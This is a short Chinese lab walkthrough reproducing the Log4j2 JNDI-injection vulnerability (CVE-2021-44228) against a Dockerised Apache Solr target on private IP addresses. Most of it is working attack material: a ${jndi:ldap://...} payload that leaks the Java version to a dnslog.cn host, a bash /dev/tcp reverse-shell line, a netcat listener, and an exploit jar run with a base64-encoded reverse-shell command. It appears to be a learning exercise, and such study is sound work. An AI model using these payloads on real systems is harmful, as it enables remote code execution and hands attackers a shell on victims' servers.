CVE-2021-44228漏洞复现
漏洞简介
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
漏洞复现
靶机:192.168.74.150
攻击机:192.168.74.148
启动docker
docker-compose
docker ps
查看docker所在进程,如图所示
在kali火狐浏览器中打开,显示此界面为成功
获得一个临时的DNS,这里是网站。
在浏览器中输入 http://192.168.74.150:5005/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.armp2a.dnslog.cn}
如图,成功回显java版本号
在攻击机中下载注入工具 git clone https://github.com/bkfish/Apache-Log4j-Learning.git
bash -i >& /dev/tcp/192.168.74.148/19999 0>&1
在攻击机上开启端口监听 nc -lvvp 19999
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc0LjE0OC8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.74.148"
#直接运行并在攻击机中开启监听
http://192.168.74.150:8983/solr/admin/cores?action=${jndi:ldap://192.168.74.148:1389/jas9lj}
随机选择一个直接使用即可
如图即表示渗透成功!
养成好习惯,用完记得关闭:docker-compose down
待完善…